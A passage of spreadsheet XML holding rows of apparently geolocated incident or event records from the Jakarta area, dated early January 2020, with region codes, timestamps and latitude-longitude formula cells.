        <v>576</v>
      </c>
      <c r="H106" t="s">
        <v>26</v>
      </c>
      <c r="I106" t="s">
        <v>248</v>
      </c>
      <c r="J106" t="s">
        <v>577</v>
      </c>
      <c r="L106" t="s">
        <v>578</v>
      </c>
      <c r="M106">
        <v>3174010006</v>
      </c>
      <c r="N106">
        <v>3174010</v>
      </c>
      <c r="O106">
        <v>3174</v>
      </c>
      <c r="P106">
        <v>31</v>
      </c>
      <c r="Q106" t="s">
        <v>268</v>
      </c>
      <c r="R106" t="s">
        <v>69</v>
      </c>
      <c r="S106" t="s">
        <v>32</v>
      </c>
      <c r="T106" t="s">
        <v>33</v>
      </c>
      <c r="U106" s="5">
        <v>10673851</v>
      </c>
      <c r="V106" s="5" t="s">
        <v>14553</v>
      </c>
      <c r="W106" s="5">
        <v>-617334</v>
      </c>
      <c r="X106" t="s">
        <v>18366</v>
      </c>
      <c r="Y106" t="str">
        <f t="shared" si="1"/>
        <v>-6.17334,106.73851</v>
      </c>
    </row>
    <row r="107" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A107">
        <v>100227</v>
      </c>
      <c r="B107" s="1">
        <v>43832</v>
      </c>
      <c r="C107" s="2">
        <v>0.23548611111111109</v>
      </c>
      <c r="D107" t="s">
        <v>22</v>
      </c>
      <c r="E107" t="s">
        <v>23</v>
      </c>
      <c r="F107" t="s">
        <v>579</v>
      </c>
      <c r="G107" t="s">
        <v>580</v>
      </c>
      <c r="H107" t="s">
        <v>26</v>
      </c>
      <c r="I107" t="s">
        <v>197</v>
      </c>
      <c r="J107" t="s">
        <v>581</v>
      </c>
      <c r="L107" t="s">
        <v>582</v>
      </c>
      <c r="M107">
        <v>3174020007</v>
      </c>
      <c r="N107">
        <v>3174020</v>
      </c>
      <c r="O107">
        <v>3174</v>
      </c>
      <c r="P107">
        <v>31</v>
      </c>
      <c r="Q107" t="s">
        <v>95</v>
      </c>
      <c r="R107" t="s">
        <v>31</v>
      </c>
      <c r="S107" t="s">
        <v>32</v>
      </c>
      <c r="T107" t="s">
        <v>33</v>
      </c>
      <c r="U107" s="5">
        <v>10676572</v>
      </c>
      <c r="V107" s="5" t="s">
        <v>14554</v>
      </c>
      <c r="W107" s="5">
        <v>-616929</v>
      </c>
      <c r="X107" t="s">
        <v>18367</v>
      </c>
      <c r="Y107" t="str">
        <f t="shared" si="1"/>
        <v>-6.16929,106.76572</v>
      </c>
    </row>
    <row r="108" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A108">
        <v>100253</v>
      </c>
      <c r="B108" s="1">
        <v>43832</v>
      </c>
      <c r="C108" s="2">
        <v>0.24355324074074072</v>
      </c>
      <c r="D108" t="s">
        <v>22</v>
      </c>
      <c r="E108" t="s">
        <v>23</v>
      </c>
      <c r="F108" t="s">
        <v>583</v>
      </c>
      <c r="G108" t="s">
        <v>584</v>
      </c>
      <c r="H108" t="s">
        <v>26</v>
      </c>
      <c r="I108" t="s">
        <v>585</v>
      </c>
      <c r="J108" t="s">
        <v>586</v>
      </c>
      <c r="L108" t="s">
        <v>587</v>
      </c>
      <c r="M108">
        <v>3173050002</v>
      </c>
      <c r="N108">
        <v>3173050</v>
      </c>
      <c r="O108">
        <v>3173</v>
      </c>
      <c r="P108">
        <v>31</v>
      </c>
      <c r="Q108" t="s">
        <v>588</v>
      </c>
      <c r="R108" t="s">
        <v>589</v>
      </c>
      <c r="S108" t="s">
        <v>62</v>
      </c>
      <c r="T108" t="s">
        <v>33</v>
      </c>
      <c r="U108" s="5">
        <v>10686539</v>
      </c>
      <c r="V108" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W108" s="5">
        <v>-617469</v>
      </c>
      <c r="X108" t="s">
        <v>18368</v>
      </c>
      <c r="Y108" t="str">
        <f t="shared" si="1"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="109" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A109">
        <v>100264</v>
      </c>
      <c r="B109" s="1">
        <v>43832</v>
      </c>
      <c r="C109" s="2">
        <v>0.24836805555555555</v>
      </c>
      <c r="D109" t="s">
        <v>22</v>
      </c>
      <c r="E109" t="s">
        <v>23</v>
      </c>
      <c r="F109" t="s">
        <v>590</v>
      </c>
      <c r="G109" t="s">
        <v>591</v>
      </c>
      <c r="H109" t="s">
        <v>26</v>
      </c>
      <c r="I109" t="s">
        <v>592</v>
      </c>
      <c r="J109" t="s">
        <v>593</v>
      </c>
      <c r="L109" t="s">
        <v>594</v>
      </c>
      <c r="M109">
        <v>3174070006</v>
      </c>
      <c r="N109">
        <v>3174070</v>
      </c>
      <c r="O109">
        <v>3174</v>
      </c>
      <c r="P109">
        <v>31</v>
      </c>
      <c r="Q109" t="s">
        <v>595</v>
      </c>
      <c r="R109" t="s">
        <v>84</v>
      </c>
      <c r="S109" t="s">
        <v>32</v>
      </c>
      <c r="T109" t="s">
        <v>33</v>
      </c>
      <c r="U109" s="5">
        <v>10672342</v>
      </c>
      <c r="V109" s="5" t="s">
        <v>14556</v>
      </c>
      <c r="W109" s="5">
        <v>-613383</v>
      </c>
      <c r="X109" t="s">
        <v>18369</v>
      </c>
      <c r="Y109" t="str">
        <f t="shared" si="1"/>
        <v>-6.13383,106.72342</v>
      </c>
    </row>
    <row r="110" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A110">
        <v>100265</v>
      </c>
      <c r="B110" s="1">
        <v>43832</v>
      </c>
      <c r="C110" s="2">
        <v>0.25143518518518521</v>
      </c>
      <c r="D110" t="s">
        <v>22</v>
      </c>
      <c r="E110" t="s">
        <v>23</v>
      </c>
      <c r="F110" t="s">
        <v>596</v>
      </c>
      <c r="G110" t="s">
        <v>597</v>
      </c>
      <c r="H110" t="s">
        <v>26</v>
      </c>
      <c r="I110" t="s">
        <v>598</v>
      </c>
      <c r="J110" t="s">
        <v>37</v>
      </c>
      <c r="L110" t="s">
        <v>599</v>
      </c>
      <c r="M110">
        <v>3216082001</v>
      </c>
      <c r="N110">
        <v>3216082</v>
      </c>
      <c r="O110">
        <v>3216</v>
      </c>
      <c r="P110">
        <v>32</v>
      </c>
      <c r="Q110" t="s">
        <v>600</v>
      </c>
      <c r="R110" t="s">
        <v>601</v>
      </c>
      <c r="S110" t="s">
        <v>41</v>
      </c>
      <c r="T110" t="s">
        <v>42</v>
      </c>
      <c r="U110" s="5">
        <v>10704063</v>
      </c>
      <c r="V110" s="5" t="s">
        <v>14557</v>
      </c>
      <c r="W110" s="5">
        <v>-622796</v>
      </c>
      <c r="X110" t="s">
        <v>18370</v>
      </c>
      <c r="Y110" t="str">
        <f t="shared" si="1"/>
        <v>-6.22796,107.04063</v>
      </c>
    </row>
    <row r="111" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A111">
        <v>100266</v>
      </c>
      <c r="B111" s="1">
        <v>43832</v>
      </c>
      <c r="C111" s="2">
        <v>0.23363425925925926</v>
      </c>
      <c r="D111" t="s">
        <v>85</v>
      </c>
      <c r="E111" t="s">
        <v>23</v>
      </c>
      <c r="F111" t="s">
        <v>602</v>
      </c>
      <c r="G111" t="s">
        <v>603</v>
      </c>
      <c r="H111" t="s">
        <v>26</v>
      </c>
      <c r="I111" t="s">
        <v>103</v>
      </c>
      <c r="J111" t="s">
        <v>577</v>
      </c>
      <c r="K111" t="s">
        <v>604</v>
      </c>
      <c r="L111" t="s">
        <v>605</v>
      </c>
      <c r="M111">
        <v>3174010006</v>
      </c>
      <c r="N111">
        <v>3174010</v>
      </c>
      <c r="O111">
        <v>3174</v>
      </c>
      <c r="P111">
        <v>31</v>
      </c>
      <c r="Q111" t="s">
        <v>268</v>
      </c>
      <c r="R111" t="s">
        <v>69</v>
      </c>
      <c r="S111" t="s">
        <v>32</v>
      </c>
      <c r="T111" t="s">
        <v>33</v>
      </c>
      <c r="U111" s="5">
        <v>10673870</v>
      </c>
      <c r="V111" s="5" t="s">
        <v>14558</v>
      </c>
      <c r="W111" s="5">
        <v>-617297</v>
      </c>
      <c r="X111" t="s">
        <v>18371</v>
      </c>
      <c r="Y111" t="str">
        <f t="shared" si="1"/>
        <v>-6.17297,106.73870</v>
      </c>
    </row>
    <row r="112" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A112">
        <v>100273</v>
      </c>
      <c r="B112" s="1">
        <v>43832</v>
      </c>
      <c r="C112" s="2">
        <v>0.2447222222222222</v>
      </c>
      <c r="D112" t="s">
        <v>85</v>
      </c>
      <c r="E112" t="s">
        <v>23</v>
      </c>
      <c r="F112" t="s">
        <v>606</v>
      </c>
      <c r="G112" t="s">
        <v>607</v>
      </c>
      <c r="H112" t="s">
        <v>26</v>
      </c>
      <c r="I112" t="s">
        <v>608</v>
      </c>
      <c r="J112" t="s">
        <v>37</v>
      </c>
      <c r="K112" t="s">
        <v>609</v>
      </c>
      <c r="L112" t="s">
        <v>610</v>
      </c>
      <c r="M112">
        <v>3275060001</v>
      </c>
      <c r="N112">
        <v>3275060</v>
      </c>
      <c r="O112">
        <v>3275</v>
      </c>
      <c r="P112">
        <v>32</v>
      </c>
      <c r="Q112" t="s">
        <v>611</v>
      </c>
      <c r="R112" t="s">
        <v>114</v>
      </c>
      <c r="S112" t="s">
        <v>41</v>
      </c>
      <c r="T112" t="s">
        <v>42</v>
      </c>
      <c r="U112" s="5">
        <v>10694958</v>
      </c>
      <c r="V112" s="5" t="s">
        <v>14559</v>
      </c>
      <c r="W112" s="5">
        <v>-624634</v>
      </c>
      <c r="X112" t="s">
        <v>18372</v>
      </c>
      <c r="Y112" t="str">
        <f t="shared" si="1"/>
        <v>-6.24634,106.94958</v>
      </c>
    </row>
    <row r="113" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A113">
        <v>100276</v>
      </c>
      <c r="B113" s="1">
        <v>43832</v>
      </c>
      <c r="C113" s="2">
        <v>0.2528125</v>
      </c>
      <c r="D113" t="s">
        <v>22</v>
      </c>
      <c r="E113" t="s">
        <v>23</v>
      </c>
      <c r="F113" t="s">
        <v>612</v>
      </c>
      <c r="H113" t="s">
        <v>26</v>
      </c>
      <c r="I113" t="s">
        <v>613</v>
      </c>
      <c r="J113" t="s">
        <v>614</v>
      </c>
      <c r="L113" t="s">
        <v>615</v>
      </c>
      <c r="M113">
        <v>3175010002</v>
      </c>
      <c r="N113">
        <v>3175010</v>
      </c>
      <c r="O113">
        <v>3175</v>
      </c>
      <c r="P113">
        <v>31</v>
      </c>
      <c r="Q113" t="s">
        <v>616</v>
      </c>
      <c r="R113" t="s">
        <v>546</v>
      </c>
      <c r="S113" t="s">
        <v>547</v>
      </c>
      <c r="T113" t="s">
        <v>33</v>
      </c>
      <c r="U113" s="5">
        <v>10677272</v>
      </c>
      <c r="V113" s="5" t="s">
        <v>14560</v>
      </c>
      <c r="W113" s="5">
        <v>-613313</v>
      </c>
      <c r="X113" t="s">
        <v>18373</v>
      </c>
      <c r="Y113" t="str">
        <f t="shared" si="1"/>
        <v>-6.13313,106.77272</v>
      </c>
    </row>
    <row r="114" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A114">
        <v>100277</v>
      </c>
      <c r="B114" s="1">
        <v>43832</v>
      </c>
      <c r="C114" s="2">
        <v>0.25693287037037038</v>
      </c>
      <c r="D114" t="s">
        <v>22</v>
      </c>
      <c r="E114" t="s">
        <v>23</v>
      </c>
      <c r="F114" t="s">
        <v>617</v>
      </c>
      <c r="G114" t="s">
        <v>618</v>
      </c>
      <c r="H114" t="s">
        <v>26</v>
      </c>
      <c r="I114" t="s">
        <v>571</v>
      </c>
      <c r="J114" t="s">
        <v>619</v>
      </c>
      <c r="L114" t="s">
        <v>620</v>
      </c>
      <c r="M114">
        <v>3174070002</v>
      </c>
      <c r="N114">
        <v>3174070</v>
      </c>
      <c r="O114">
        <v>3174</v>
      </c>
      <c r="P114">
        <v>31</v>
      </c>
      <c r="Q114" t="s">
        <v>621</v>
      </c>
      <c r="R114" t="s">
        <v>84</v>
      </c>
      <c r="S114" t="s">
        <v>32</v>
      </c>
      <c r="T114" t="s">
        <v>33</v>
      </c>
      <c r="U114" s="5">
        <v>10674309</v>
      </c>
      <c r="V114" s="5" t="s">
        <v>14561</v>
      </c>
      <c r="W114" s="5">
        <v>-616471</v>
      </c>
      <c r="X114" t="s">
        <v>18374</v>
      </c>
      <c r="Y114" t="str">
        <f t="shared" si="1"/>
        <v>-6.16471,106.74309</v>
      </c>
    </row>
    <row r="115" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A115">
        <v>100290</v>
      </c>
      <c r="B115" s="1">
        <v>43832</v>
      </c>
      <c r="C115" s="2">
        <v>0.25865740740740739</v>
      </c>
      <c r="D115" t="s">
        <v>22</v>
      </c>
      <c r="E115" t="s">
        <v>23</v>
      </c>
      <c r="F115" t="s">
        <v>622</v>
      </c>
      <c r="G115" t="s">
        <v>623</v>
      </c>
      <c r="H115" t="s">
        <v>26</v>
      </c>
      <c r="I115" t="s">
        <v>624</v>
      </c>
      <c r="J115" t="s">
        <v>625</v>
      </c>
      <c r="L115" t="s">
        <v>626</v>
      </c>
      <c r="M115">
        <v>3174070001</v>
      </c>
      <c r="N115">
        <v>3174070</v>
      </c>
      <c r="O115">
        <v>3174</v>
      </c>
      <c r="P115">
        <v>31</v>
      </c>
      <c r="Q115" t="s">
        <v>83</v>
      </c>
      <c r="R115" t="s">
        <v>84</v>
      </c>
      <c r="S115" t="s">
        <v>32</v>
      </c>
      <c r="T115" t="s">
        <v>33</v>
      </c>
      <c r="U115" s="5">
        <v>10671530</v>
      </c>
      <c r="V115" s="5" t="s">
        <v>14562</v>
      </c>
      <c r="W115" s="5">
        <v>-617528</v>
      </c>
      <c r="X115" t="s">
        <v>18375</v>
      </c>
      <c r="Y115" t="str">
        <f t="shared" si="1"/>
        <v>-6.17528,106.71530</v>
      </c>
    </row>
    <row r="116" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A116">
        <v>100347</v>
      </c>
      <c r="B116" s="1">
        <v>43832</v>
      </c>
      <c r="C116" s="2">
        <v>0.27373842592592595</v>
      </c>
      <c r="D116" t="s">
        <v>22</v>
      </c>
      <c r="E116" t="s">
        <v>23</v>
      </c>
      <c r="F116" t="s">
        <v>627</v>
      </c>
      <c r="H116" t="s">
        <v>26</v>
      </c>
      <c r="I116" t="s">
        <v>628</v>
      </c>
      <c r="J116" t="s">
        <v>629</v>
      </c>
      <c r="L116" t="s">
        <v>630</v>
      </c>
      <c r="M116">
        <v>3174040007</v>
      </c>
      <c r="N116">
        <v>3174040</v>
      </c>
      <c r="O116">
        <v>3174</v>
      </c>
      <c r="P116">
        <v>31</v>
      </c>
      <c r="Q116" t="s">
        <v>389</v>
      </c>
      <c r="R116" t="s">
        <v>377</v>
      </c>
      <c r="S116" t="s">
        <v>32</v>
      </c>
      <c r="T116" t="s">
        <v>33</v>
      </c>
      <c r="U116" s="5">
        <v>10678458</v>
      </c>
      <c r="V116" s="5" t="s">
        <v>14563</v>
      </c>
      <c r="W116" s="5">
        <v>-614387</v>
      </c>
      <c r="X116" t="s">
        <v>18376</v>
      </c>
      <c r="Y116" t="str">
        <f t="shared" si="1"/>
        <v>-6.14387,106.78458</v>
      </c>
    </row>
    <row r="117" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A117">
        <v>100368</v>
      </c>
      <c r="B117" s="1">
        <v>43832</v>
      </c>
      <c r="C117" s="2">
        <v>0.2767013888888889</v>
      </c>
      <c r="D117" t="s">
        <v>22</v>
      </c>
      <c r="E117" t="s">
        <v>23</v>
      </c>
      <c r="F117" t="s">
        <v>631</v>
      </c>
      <c r="G117" t="s">
        <v>632</v>
      </c>
      <c r="H117" t="s">
        <v>26</v>
      </c>
      <c r="I117" t="s">
        <v>131</v>
      </c>
      <c r="J117" t="s">
        <v>404</v>
      </c>
      <c r="L117" t="s">
        <v>633</v>
      </c>
      <c r="M117">
        <v>3174020005</v>
      </c>
      <c r="N117">
        <v>3174020</v>
      </c>
      <c r="O117">
        <v>3174</v>
      </c>
      <c r="P117">
        <v>31</v>
      </c>
      <c r="Q117" t="s">
        <v>30</v>
      </c>
      <c r="R117" t="s">
        <v>31</v>
      </c>
      <c r="S117" t="s">
        <v>32</v>
      </c>
      <c r="T117" t="s">
        <v>33</v>
      </c>
      <c r="U117" s="5">
        <v>10676788</v>
      </c>
      <c r="V117" s="5" t="s">
        <v>14564</v>
      </c>
      <c r="W117" s="5">
        <v>-616415</v>
      </c>
      <c r="X117" t="s">
        <v>18377</v>
      </c>
      <c r="Y117" t="str">
        <f t="shared" si="1"/>
        <v>-6.16415,106.76788</v>
      </c>
    </row>
    <row r="118" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A118">
        <v>100375</v>
      </c>
      <c r="B118" s="1">
        <v>43832</v>
      </c>
      <c r="C118" s="2">
        <v>0.27912037037037035</v>
      </c>
      <c r="D118" t="s">
        <v>22</v>
      </c>
      <c r="E118" t="s">
        <v>23</v>
      </c>
      <c r="F118" t="s">
        <v>634</v>
      </c>
      <c r="G118" t="s">
        <v>635</v>
      </c>
      <c r="H118" t="s">
        <v>26</v>
      </c>
      <c r="I118" t="s">
        <v>636</v>
      </c>
      <c r="J118" t="s">
        <v>478</v>
      </c>
      <c r="L118" t="s">
        <v>637</v>
      </c>
      <c r="M118">
        <v>3174070001</v>
      </c>
      <c r="N118">
        <v>3174070</v>
      </c>
      <c r="O118">
        <v>3174</v>
      </c>
      <c r="P118">
        <v>31</v>
      </c>
      <c r="Q118" t="s">
        <v>83</v>
      </c>
      <c r="R118" t="s">
        <v>84</v>
      </c>
      <c r="S118" t="s">
        <v>32</v>
      </c>
      <c r="T118" t="s">
        <v>33</v>
      </c>
      <c r="U118" s="5">
        <v>10671899</v>
      </c>
      <c r="V118" s="5" t="s">
        <v>14565</v>
      </c>
      <c r="W118" s="5">
        <v>-616835</v>
      </c>
      <c r="X118" t="s">
        <v>18378</v>
      </c>
      <c r="Y118" t="str">
        <f t="shared" si="1"/>
        <v>-6.16835,106.71899</v>
      </c>
    </row>
    <row r="119" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A119">
        <v>100420</v>
      </c>
      <c r="B119" s="1">
        <v>43832</v>
      </c>
      <c r="C119" s="2">
        <v>0.28872685185185182</v>
      </c>
      <c r="D119" t="s">
        <v>22</v>
      </c>
      <c r="E119" t="s">
        <v>23</v>
      </c>
      <c r="F119" t="s">
        <v>638</v>
      </c>
      <c r="H119" t="s">
        <v>26</v>
      </c>
      <c r="I119" t="s">
        <v>639</v>
      </c>
      <c r="J119" t="s">
        <v>586</v>
      </c>
      <c r="L119" t="s">
        <v>640</v>
      </c>
      <c r="M119">
        <v>3173050002</v>
      </c>
      <c r="N119">
        <v>3173050</v>
      </c>
      <c r="O119">
        <v>3173</v>
      </c>
      <c r="P119">
        <v>31</v>
      </c>
      <c r="Q119" t="s">
        <v>588</v>
      </c>
      <c r="R119" t="s">
        <v>589</v>
      </c>
      <c r="S119" t="s">
        <v>62</v>
      </c>
      <c r="T119" t="s">
        <v>33</v>
      </c>
      <c r="U119" s="5">
        <v>10686539</v>
      </c>
      <c r="V119" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W119" s="5">
        <v>-617605</v>
      </c>
      <c r="X119" t="s">
        <v>18379</v>
      </c>
      <c r="Y119" t="str">
        <f t="shared" si="1"/>
        <v>-6.17605,106.86539</v>
      </c>
    </row>
    <row r="120" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A120">
        <v>100435</v>
      </c>
      <c r="B120" s="1">
        <v>43832</v>
      </c>
      <c r="C120" s="2">
        <v>0.29265046296296299</v>
      </c>
      <c r="D120" t="s">
        <v>22</v>
      </c>
      <c r="E120" t="s">
        <v>23</v>
      </c>
      <c r="F120" t="s">
        <v>641</v>
      </c>
      <c r="G120" t="s">
        <v>642</v>
      </c>
      <c r="H120" t="s">
        <v>26</v>
      </c>
      <c r="I120" t="s">
        <v>643</v>
      </c>
      <c r="J120" t="s">
        <v>644</v>
      </c>
      <c r="L120" t="s">
        <v>645</v>
      </c>
      <c r="M120">
        <v>3174070002</v>
      </c>
      <c r="N120">
        <v>3174070</v>
      </c>
      <c r="O120">
        <v>3174</v>
      </c>
      <c r="P120">
        <v>31</v>
      </c>
      <c r="Q120" t="s">
        <v>621</v>
      </c>
      <c r="R120" t="s">
        <v>84</v>
      </c>
      <c r="S120" t="s">
        <v>32</v>
      </c>
      <c r="T120" t="s">
        <v>33</v>
      </c>
      <c r="U120" s="5">
        <v>10674761</v>
      </c>
      <c r="V120" s="5" t="s">
        <v>14566</v>
      </c>
      <c r="W120" s="5">
        <v>-616372</v>
      </c>
      <c r="X120" t="s">
        <v>18380</v>
      </c>
      <c r="Y120" t="str">
        <f t="shared" si="1"/>
        <v>-6.16372,106.74761</v>
      </c>
    </row>
    <row r="121" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A121">
        <v>100448</v>
      </c>
      <c r="B121" s="1">
        <v>43832</v>
      </c>
      <c r="C121" s="2">
        <v>0.29444444444444445</v>
      </c>
      <c r="D121" t="s">
        <v>22</v>
      </c>
      <c r="E121" t="s">
        <v>23</v>
      </c>
      <c r="F121" t="s">
        <v>646</v>
      </c>
      <c r="H121" t="s">
        <v>26</v>
      </c>
      <c r="I121" t="s">
        <v>647</v>
      </c>
      <c r="J121" t="s">
        <v>648</v>
      </c>
      <c r="L121" t="s">
        <v>649</v>
      </c>
      <c r="M121">
        <v>3174020005</v>
      </c>
      <c r="N121">
        <v>3174020</v>
      </c>
      <c r="O121">
        <v>3174</v>
      </c>
      <c r="P121">
        <v>31</v>
      </c>
      <c r="Q121" t="s">
        <v>30</v>
      </c>
      <c r="R121" t="s">
        <v>31</v>
      </c>
      <c r="S121" t="s">
        <v>32</v>
      </c>
      <c r="T121" t="s">
        <v>33</v>
      </c>
      <c r="U121" s="5">
        <v>10677904</v>
      </c>
      <c r="V121" s="5" t="s">
        <v>14567</v>
      </c>
      <c r="W121" s="5">
        <v>-617387</v>
      </c>
      <c r="X121" t="s">
        <v>18381</v>
      </c>
      <c r="Y121" t="str">
        <f t="shared" si="1"/>
        <v>-6.17387,106.77904</v>
      </c>
    </row>
    <row r="122" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A122">
        <v>100451</v>
      </c>
      <c r="B122" s="1">
        <v>43832</v>
      </c>
      <c r="C122" s="2">
        <v>0.29549768518518521</v>
      </c>
      <c r="D122" t="s">
        <v>22</v>
      </c>
      <c r="E122" t="s">
        <v>23</v>
      </c>
      <c r="F122" s="3" t="s">
        <v>650</v>
      </c>
      <c r="H122" t="s">
        <v>26</v>
      </c>
      <c r="I122" t="s">
        <v>166</v>
      </c>
      <c r="J122" t="s">
        <v>586</v>
      </c>
      <c r="L122" t="s">
        <v>651</v>
      </c>
      <c r="M122">
        <v>3173050002</v>
      </c>
      <c r="N122">
        <v>3173050</v>
      </c>
      <c r="O122">
        <v>3173</v>
      </c>
      <c r="P122">
        <v>31</v>
      </c>
      <c r="Q122" t="s">
        <v>588</v>
      </c>
      <c r="R122" t="s">
        <v>589</v>
      </c>
      <c r="S122" t="s">
        <v>62</v>
      </c>
      <c r="T122" t="s">
        <v>33</v>
      </c>
      <c r="U122" s="5">
        <v>10686500</v>
      </c>
      <c r="V122" s="5" t="s">
        <v>14568</v>
      </c>
      <c r="W122" s="5">
        <v>-617510</v>
      </c>
      <c r="X122" t="s">
        <v>18382</v>
      </c>
      <c r="Y122" t="str">
        <f t="shared" si="1"/>
        <v>-6.17510,106.86500</v>
      </c>
    </row>
    <row r="123" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A123">
        <v>100457</v>
      </c>
      <c r="B123" s="1">
        <v>43832</v>
      </c>
      <c r="C123" s="2">
        <v>0.29685185185185187</v>
      </c>
      <c r="D123" t="s">
        <v>22</v>
      </c>
      <c r="E123" t="s">
        <v>23</v>
      </c>
      <c r="F123" t="s">
        <v>652</v>
      </c>
      <c r="G123" t="s">
        <v>653</v>
      </c>
      <c r="H123" t="s">
        <v>26</v>
      </c>
      <c r="I123" t="s">
        <v>654</v>
      </c>
      <c r="J123" t="s">
        <v>37</v>
      </c>
      <c r="L123" t="s">
        <v>655</v>
      </c>
      <c r="M123">
        <v>3216082001</v>
      </c>
      <c r="N123">
        <v>3216082</v>
      </c>
      <c r="O123">
        <v>3216</v>
      </c>
      <c r="P123">
        <v>32</v>
      </c>
      <c r="Q123" t="s">
        <v>600</v>
      </c>
      <c r="R123" t="s">
        <v>601</v>
      </c>
      <c r="S123" t="s">
        <v>41</v>
      </c>
      <c r="T123" t="s">
        <v>42</v>
      </c>
      <c r="U123" s="5">
        <v>10704081</v>
      </c>
      <c r="V123" s="5" t="s">
        <v>14569</v>
      </c>
      <c r="W123" s="5">
        <v>-622745</v>
      </c>
      <c r="X123" t="s">
        <v>18383</v>
      </c>
      <c r="Y123" t="str">
        <f t="shared" si="1"/>
        <v>-6.22745,107.04081</v>
      </c>
    </row>
    <row r="124" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A124">
        <v>100461</v>
      </c>
      <c r="B124" s="1">
        <v>43832</v>
      </c>
      <c r="C124" s="2">
        <v>0.29829861111111111</v>
      </c>
      <c r="D124" t="s">
        <v>22</v>
      </c>
      <c r="E124" t="s">
        <v>23</v>
      </c>
      <c r="F124" t="s">
        <v>656</v>
      </c>
      <c r="H124" t="s">
        <v>26</v>
      </c>
      <c r="I124" t="s">
        <v>657</v>
      </c>
      <c r="J124" t="s">
        <v>28</v>
      </c>
      <c r="L124" t="s">
        <v>658</v>
      </c>
      <c r="M124">
        <v>3174020005</v>
      </c>
      <c r="N124">
        <v>3174020</v>
      </c>
      <c r="O124">
        <v>3174</v>
      </c>
      <c r="P124">
        <v>31</v>
      </c>
      <c r="Q124" t="s">
        <v>30</v>
      </c>
      <c r="R124" t="s">
        <v>31</v>
      </c>
      <c r="S124" t="s">
        <v>32</v>
      </c>
      <c r="T124" t="s">
        <v>33</v>
      </c>
      <c r="U124" s="5">
        <v>10677121</v>
      </c>
      <c r="V124" s="5" t="s">
        <v>14570</v>
      </c>
      <c r="W124" s="5">
        <v>-617184</v>
      </c>
      <c r="X124" t="s">
        <v>18384</v>
      </c>
      <c r="Y124" t="str">
        <f t="shared" si="1"/>
        <v>-6.17184,106.77121</v>
      </c>
    </row>
    <row r="125" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A125">
        <v>100481</v>
      </c>
      <c r="B125" s="1">
        <v>43832</v>
      </c>
      <c r="C125" s="2">
        <v>0.30612268518518521</v>
      </c>
      <c r="D125" t="s">
        <v>22</v>
      </c>
      <c r="E125" t="s">
        <v>23</v>
      </c>
      <c r="F125" t="s">
        <v>659</v>
      </c>
      <c r="G125" t="s">
        <v>660</v>
      </c>
      <c r="H125" t="s">
        <v>26</v>
      </c>
      <c r="I125" t="s">
        <v>661</v>
      </c>
      <c r="J125" t="s">
        <v>37</v>
      </c>
      <c r="M125">
        <v>3275060002</v>
      </c>
      <c r="N125">
        <v>3275060</v>
      </c>
      <c r="O125">
        <v>3275</v>
      </c>
      <c r="P125">
        <v>32</v>
      </c>
      <c r="Q125" t="s">
        <v>113</v>
      </c>
      <c r="R125" t="s">
        <v>114</v>
      </c>
      <c r="S125" t="s">
        <v>41</v>
      </c>
      <c r="T125" t="s">
        <v>42</v>
      </c>
      <c r="U125" s="5">
        <v>10696830</v>
      </c>
      <c r="V125" s="5" t="s">
        <v>14571</v>
      </c>
      <c r="W125" s="5">
        <v>-622820</v>
      </c>
      <c r="X125" t="s">
        <v>18385</v>
      </c>
      <c r="Y125" t="str">
        <f t="shared" si="1"/>
        <v>-6.22820,106.96830</v>
      </c>
    </row>
    <row r="126" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A126">
        <v>100485</v>
      </c>
      <c r="B126" s="1">
        <v>43832</v>
      </c>
      <c r="C126" s="2">
        <v>0.30745370370370367</v>
      </c>
      <c r="D126" t="s">
        <v>22</v>
      </c>
      <c r="E126" t="s">
        <v>23</v>
      </c>
      <c r="F126" t="s">
        <v>662</v>
      </c>
      <c r="H126" t="s">
        <v>26</v>
      </c>
      <c r="I126" t="s">
        <v>628</v>
      </c>
      <c r="J126" t="s">
        <v>586</v>
      </c>
      <c r="L126" t="s">
        <v>663</v>
      </c>
      <c r="M126">
        <v>3173050002</v>
      </c>
      <c r="N126">
        <v>3173050</v>
      </c>
      <c r="O126">
        <v>3173</v>
      </c>
      <c r="P126">
        <v>31</v>
      </c>
      <c r="Q126" t="s">
        <v>588</v>
      </c>
      <c r="R126" t="s">
        <v>589</v>
      </c>
      <c r="S126" t="s">
        <v>62</v>
      </c>
      <c r="T126" t="s">
        <v>33</v>
      </c>
      <c r="U126" s="5">
        <v>10686539</v>
      </c>
      <c r="V126" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W126" s="5">
        <v>-617469</v>
      </c>
      <c r="X126" t="s">
        <v>18368</v>
      </c>
      <c r="Y126" t="str">
        <f t="shared" si="1"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="127" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A127">
        <v>100493</v>
      </c>
      <c r="B127" s="1">
        <v>43832</v>
      </c>
      <c r="C127" s="2">
        <v>0.31064814814814817</v>
      </c>
      <c r="D127" t="s">
        <v>22</v>
      </c>
      <c r="E127" t="s">
        <v>23</v>
      </c>
      <c r="F127" t="s">
        <v>664</v>
      </c>
      <c r="G127" t="s">
        <v>665</v>
      </c>
      <c r="H127" t="s">
        <v>26</v>
      </c>
      <c r="I127" t="s">
        <v>666</v>
      </c>
      <c r="J127" t="s">
        <v>667</v>
      </c>
      <c r="L127" t="s">
        <v>668</v>
      </c>
      <c r="M127">
        <v>3175010003</v>
      </c>
      <c r="N127">
